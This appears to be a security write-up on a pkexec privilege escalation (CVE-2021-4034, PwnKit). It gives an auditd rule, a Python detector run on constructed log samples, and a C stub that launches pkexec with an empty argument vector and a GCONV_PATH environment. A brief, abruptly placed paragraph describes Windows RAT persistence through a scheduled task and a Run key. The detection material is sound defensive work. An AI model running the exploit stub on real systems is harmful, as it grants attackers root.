Let us walk through the lifecycle of a Baget attack as it would have occurred in 2021.
Process creation chain:
unpriv_user → pkexec → /bin/sh -c "arbitrary command"
auditctl -a always,exit -F arch=b64 -S execve -F path=/usr/bin/pkexec -k pkexec_monitor
This rule records every execve of pkexec (the arch filter is needed so the syscall number is resolved unambiguously on x86_64). Legitimate pkexec use matches it too; what separates the exploit from normal use is the accompanying EXECVE record, which carries argc=0 when pkexec was started with an empty argument vector.
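The correlation a detection engineer would put behind that rule, as an added example that is not part of the original page: it pairs each SYSCALL record for /usr/bin/pkexec with the EXECVE record of the same event and alerts when argc is 0. It assumes raw auditd records in the form `ausearch -k pkexec_monitor --raw` emits; the sample records below are constructed for illustration, not captured from a real host.

```python
import re
from collections import defaultdict

# Constructed audit records for illustration (not captured from a real host). The
# first event is pkexec started with an empty argv, which auditd records as
# argc=0; the second is an ordinary pkexec invocation; the third is unrelated.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1642000000.101:4567): arch=c000003e syscall=59 success=yes exit=0 a0=55d0c0a2b2a0 a1=7ffd2f3c0e10 a2=7ffd2f3c0e18 a3=0 items=2 ppid=2210 pid=2211 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="pkexec" exe="/usr/bin/pkexec" key="pkexec_monitor"
type=EXECVE msg=audit(1642000000.101:4567): argc=0
type=SYSCALL msg=audit(1642000000.205:4568): arch=c000003e syscall=59 success=yes exit=0 a0=55d0c0a2b2a0 a1=7ffd2f3c0e10 a2=7ffd2f3c0e18 a3=0 items=2 ppid=2210 pid=2212 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="pkexec" exe="/usr/bin/pkexec" key="pkexec_monitor"
type=EXECVE msg=audit(1642000000.205:4568): argc=2 a0="pkexec" a1="/usr/bin/systemctl"
type=SYSCALL msg=audit(1642000000.300:4569): arch=c000003e syscall=59 success=yes exit=0 a0=55d0c0a2c4f0 a1=7ffd2f3c0f20 a2=7ffd2f3c0f30 a3=0 items=2 ppid=2210 pid=2213 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=3 comm="id" exe="/usr/bin/id"
type=EXECVE msg=audit(1642000000.300:4569): argc=1 a0="id"
"""

RECORD_RE = re.compile(
    r'^type=(?P<type>\w+) msg=audit\((?P<event>\d+\.\d+:\d+)\): (?P<body>.*)$')
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
PKEXEC = "/usr/bin/pkexec"


def parse_record(line):
    """Split one raw audit line into its type, event id (timestamp:serial) and fields."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    fields = {k: v.strip('"') for k, v in FIELD_RE.findall(m.group("body"))}
    return {"type": m.group("type"), "event": m.group("event"), "fields": fields}


def group_events(lines):
    """Group records by event id; the SYSCALL and EXECVE records of one execve share it."""
    events = defaultdict(dict)
    for line in lines:
        rec = parse_record(line)
        if rec is not None:
            events[rec["event"]][rec["type"]] = rec["fields"]
    return events


def detect_argc0_pkexec(lines):
    """Return one alert per execve of pkexec whose argument vector was empty."""
    alerts = []
    for event, recs in sorted(group_events(lines).items()):
        syscall, execve = recs.get("SYSCALL"), recs.get("EXECVE")
        if syscall is None or execve is None:
            continue                       # incomplete event, nothing to correlate
        if syscall.get("exe") != PKEXEC:
            continue                       # not pkexec, ordinary execve
        if int(execve.get("argc", -1)) != 0:
            continue                       # normal use of pkexec always has argv[0]
        alerts.append({
            "event": event,
            "pid": int(syscall["pid"]),
            "auid": int(syscall["auid"]),   # login user who launched it
            "euid": int(syscall["euid"]),   # 0 here because pkexec is setuid root
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_argc0_pkexec(SAMPLE_AUDIT_LOG.splitlines()):
        print(f"pkexec started with argc=0: event {alert['event']} "
              f"pid {alert['pid']} auid {alert['auid']} euid {alert['euid']}")
```

Keying on the full `timestamp:serial` pair rather than the serial alone matters on long-running hosts, where serials restart after a reboot; the auid is the field worth escalating on, since it survives the setuid transition that makes euid 0 on every pkexec run.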
The Baget stub creates a scheduled task named WindowsUpdateService that fires every 15 minutes and also adds itself to the CurrentVersion\Run registry key. From there, the injected RAT downloads additional modules: keyloggers, clipboard stealers, or even a ransomware component. On the Linux side, the pkexec stage comes down to a few lines of C:
#include <unistd.h>

int main(void)
{
    /* Environment handed to pkexec. With argc == 0, pkexec reads envp[0]
     * where it expects argv[1]. ./exploit-dir is the attacker-controlled
     * gconv directory; its contents are not shown here. */
    char *envp[] = {
        "GCONV_PATH=./exploit-dir",
        "CHARSET=XXX",
        "SHELL=/bin/bash",
        NULL
    };
    /* Empty argument vector: argc == 0 is what triggers the out-of-bounds access. */
    char *argv[] = { NULL };
    execve("/usr/bin/pkexec", argv, envp);
    return 1; /* only reached if execve() fails */
}
With argc == 0 there is no argv[0], so pkexec reads argv[1], which in memory is envp[0], treats it as the program to run, and writes the resolved path back into that same out-of-bounds slot. That write lets the attacker smuggle GCONV_PATH into pkexec's environment after the dynamic loader has already stripped it for the setuid binary; the next time pkexec prints an error message, glibc's iconv consults GCONV_PATH, loads the attacker's gconv module from that directory and runs it as root. This is the pkexec flaw tracked as CVE-2021-4034 (PwnKit). Builds carrying the January 2022 fix exit immediately when argc is 0, and removing the setuid bit from pkexec was the standard interim mitigation.